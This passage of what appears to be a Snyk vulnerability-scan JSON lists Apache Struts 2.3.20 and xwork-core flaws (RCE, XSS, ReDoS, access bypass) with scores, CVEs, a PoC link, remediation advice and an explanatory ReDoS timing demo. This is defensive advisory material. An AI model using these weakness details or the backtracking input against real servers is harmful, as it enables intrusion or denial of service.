9.8, - "modificationTime": "2024-03-11T09:54:10.688470Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-07-23T07:46:17.121104Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:10.322561Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:10.688470Z" - } - ], - "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) via manipulation of file upload parameters that enable path traversal. 
Under certain conditions, uploading of a malicious file is possible, which may then be executed on the server.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.33, 6.3.0.2 or higher.\n## References\n- [Apache Mailing List](https://lists.apache.org/thread/yh09b3fkf6vz5d6jdgrlvmg60lfwtqhj)\n- [Exploitation Attempts](https://www.akamai.com/blog/security-research/apache-struts-cve-exploitation-attempts)\n- [GitHub Commit](https://github.com/apache/struts/commit/162e29fee9136f4bfd9b2376da2cbf590f9ea163)\n- [GitHub Commit](https://github.com/apache/struts/commit/d8c69691ef1d15e76a5f4fcf33039316da2340b6)\n- [PoC](https://github.com/wy876/POC/blob/main/Apache%20Struts2%20CVE-2023-50164.md)\n- [Struts Issue](https://cwiki.apache.org/confluence/display/WW/S2-066)\n", - "epssDetails": { - "percentile": "0.94639", - "probability": "0.09044", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2023-50164" - ], - "CWE": [ - "CWE-94" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2023-12-07T11:44:29.902168Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2023-12-07T09:45:05Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2023-12-07T12:27:32.361011Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-07-23T07:46:17.121104Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.5.33" - ], - "isUpgradable": true, - "isPatchable": false, - 
"name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30798", - "title": "Parameter Alteration", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "credit": [ - "rskvp93" - ], - "semver": { - "vulnerable": [ - "[2,2.3.24.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.24.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts.xwork:xwork-core", - "references": [ - { - "url": "https://struts.apache.org/docs/s2-026.html", - "title": "Apache Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:49:01.496065Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:10.273105Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:49:01.496065Z" - } - ], - "description": "## Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nAffected versions of the package are vulnerable to Parameter Alteration. ValueStack defines special top object which represents root of execution context. 
It can be used to manipulate Struts' internals or can be used to affect container's settings\n\n\n## References\n- [Apache Security Advisory](https://struts.apache.org/docs/s2-026.html)\n", - "epssDetails": { - "percentile": "0.70008", - "probability": "0.00305", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-5209" - ], - "CWE": [ - "CWE-235" - ] - }, - "packageName": "org.apache.struts.xwork:xwork-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:23.673000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2015-09-28T16:59:30Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts.xwork", - "artifactId": "xwork-core" - }, - "publicationTime": "2015-09-28T16:59:30Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:49:01.496065Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.24.1", - "org.apache.struts.xwork:xwork-core@2.3.24.1" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts.xwork:xwork-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30799", - "title": "Improper Input Validation", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2,2.3.28)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.28" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.8, - "functions": [], - 
"malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts.xwork:xwork-core", - "references": [ - { - "url": "https://github.com/apache/struts/commit/15857a69e7baf3675804495a5954cd0756ac8364", - "title": "GitHub Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:46:29.964282Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:37.122257Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:29.964282Z" - } - ], - "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. 
It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Improper Input Validation via a `%{}` sequence in a tag attribute, aka forced double OGNL evaluation.\n## Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.28 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/15857a69e7baf3675804495a5954cd0756ac8364)\n", - "epssDetails": { - "percentile": "0.88004", - "probability": "0.01731", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-0785" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.apache.struts.xwork:xwork-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:23.686000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-03-16T05:58:06Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts.xwork", - "artifactId": "xwork-core" - }, - "publicationTime": "2016-03-16T05:58:06Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:29.964282Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.28", - "org.apache.struts.xwork:xwork-core@2.3.28" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts.xwork:xwork-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30800", - "title": "Cross-site Scripting (XSS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2,2.3.25)" - ] - }, 
- "exploit": "Not Defined", - "fixedIn": [ - "2.3.25" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 6.1, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts.xwork:xwork-core", - "references": [ - { - "url": "https://github.com/apache/struts/commit/fc2179cf1ac9fbfb61e3430fa88b641d87253327", - "title": "GitHub Commit" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2162", - "title": "NVD" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "cvssV3BaseScore": 6.1, - "modificationTime": "2024-03-11T09:46:47.186038Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 6.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:24.610273Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:47.186038Z" - } - ], - "description": "## Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nApache Struts 2.x before 2.3.25 does not sanitize text in the Locale object constructed by I18NInterceptor, which might allow remote attackers to conduct cross-site scripting (XSS) attacks via unspecified vectors involving language display.\n\n## Details\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\r\n\r\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without 
validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\r\n\r\nֿInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\r\n\r\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\r\n \r\nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \r\n\r\n### Types of attacks\r\nThere are a few methods by which XSS can be manipulated:\r\n\r\n|Type|Origin|Description|\r\n|--|--|--|\r\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\r\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. 
When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \r\n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\r\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\r\n\r\n### Affected environments\r\nThe following environments are susceptible to an XSS attack:\r\n\r\n* Web servers\r\n* Application servers\r\n* Web application environments\r\n\r\n### How to prevent\r\nThis section describes the top best practices designed to specifically protect your code: \r\n\r\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \r\n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. 
\r\n* Give users the option to disable client-side scripts.\r\n* Redirect invalid requests.\r\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\r\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\r\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2162)", - "epssDetails": { - "percentile": "0.96202", - "probability": "0.18207", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-2162" - ], - "CWE": [ - "CWE-79" - ] - }, - "packageName": "org.apache.struts.xwork:xwork-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:23.701000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-03-16T07:51:26.242000Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts.xwork", - "artifactId": "xwork-core" - }, - "publicationTime": "2016-03-16T07:51:26.242000Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:47.186038Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.28", - "org.apache.struts.xwork:xwork-core@2.3.28" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts.xwork:xwork-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30801", - 
"title": "Improper Input Validation", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2,2.3.24.1]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts.xwork:xwork-core", - "references": [ - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3093", - "title": "NVD" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:46:50.033229Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:35.405967Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:50.033229Z" - } - ], - "description": "## Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nApache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors.\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3093)", - "epssDetails": { - "percentile": "0.90602", - "probability": "0.02732", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-3093" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": 
"org.apache.struts.xwork:xwork-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:23.713000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-06-02T02:16:48.918000Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts.xwork", - "artifactId": "xwork-core" - }, - "publicationTime": "2016-06-02T02:16:48.918000Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:50.033229Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.24.3", - "org.apache.struts.xwork:xwork-core@2.3.24.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts.xwork:xwork-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30802", - "title": "Access Restriction Bypass", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "credit": [ - "Takeshi Terada" - ], - "semver": { - "vulnerable": [ - "[2.3.20,2.3.28.1]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts.xwork:xwork-core", - "references": [ - { - "url": "https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e", - "title": "GitHub Commit" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4433", - "title": "NVD" - } - ], - "cvssDetails": [ - { - "assigner": 
"NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:46:52.478661Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:39.417349Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:52.478661Z" - } - ], - "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Access Restriction Bypass. It allows remote attackers to bypass intended access restrictions and conduct redirection attacks via a crafted request.\n## Remediation\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4433)\n", - "epssDetails": { - "percentile": "0.77304", - "probability": "0.00531", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-4433" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.apache.struts.xwork:xwork-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:23.724000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-06-21T01:33:07Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": 
"org.apache.struts.xwork", - "artifactId": "xwork-core" - }, - "publicationTime": "2016-06-21T01:33:07Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:52.478661Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.29", - "org.apache.struts.xwork:xwork-core@2.3.29" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts.xwork:xwork-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30803", - "title": "Arbitrary Code Execution", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Alvaro Munoz" - ], - "semver": { - "vulnerable": [ - "[2.2.1,2.3.28.1]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts.xwork:xwork-core", - "references": [ - { - "url": "https://struts.apache.org/docs/s2-036.html", - "title": "Apache Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:46:55.264787Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:49.390018Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.0", - "modificationTime": 
"2024-03-11T09:46:55.264787Z" - } - ], - "description": "## Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nAffected versions of the package are vulnerable to Remote code Execution. The Apache Struts frameworks when forced, performs double evaluation of attributes' values assigned to certain tags so it is possible to pass in a value that will be evaluated again when a tag's attributes will be rendered.\n\n## References\n- [Apache Security Advisory](https://struts.apache.org/docs/s2-036.html)\n", - "epssDetails": { - "percentile": "0.94726", - "probability": "0.09408", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-4461" - ], - "CWE": [ - "CWE-264" - ] - }, - "packageName": "org.apache.struts.xwork:xwork-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:23.738000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-11-14T07:48:03.440000Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts.xwork", - "artifactId": "xwork-core" - }, - "publicationTime": "2016-11-14T07:48:03.440000Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:55.264787Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.29", - "org.apache.struts.xwork:xwork-core@2.3.29" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts.xwork:xwork-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30804", - 
"title": "Regular Expression Denial of Service (ReDoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.3.20, 2.3.29)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.29" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts.xwork:xwork-core", - "references": [ - { - "url": "https://github.com/apache/struts/commit/a0fdca138feec2c2e94eb75ca1f8b76678b4d152", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/eccc31ebce5430f9e91b9684c63eaaf885e603f9", - "title": "GitHub Commit" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4465", - "title": "NVD" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:46:51.243501Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:37.316157Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:51.243501Z" - } - ], - "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). 
The URLValidator class allows remote attackers to cause a denial of service via a null value for a URL field.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\n\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\nLet’s take the following regular expression as an example:\n```js\nregex = /A(B|C+)+D/\n```\n\nThis regular expression accomplishes the following:\n- `A` The string must start with the letter 'A'\n- `(B|C+)+` The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the `+` matches one or more times). The `+` at the end of this section states that we can look for one or more matches of this section.\n- `D` Finally, we ensure this section of the string ends with a 'D'\n\nThe expression would match inputs such as `ABBD`, `ABCCCCD`, `ABCBCCCD` and `ACCCCCD`\n\nIt most cases, it doesn't take very long for a regex engine to find a match:\n\n```bash\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD\")'\n0.04s user 0.01s system 95% cpu 0.052 total\n\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX\")'\n1.79s user 0.02s system 99% cpu 1.812 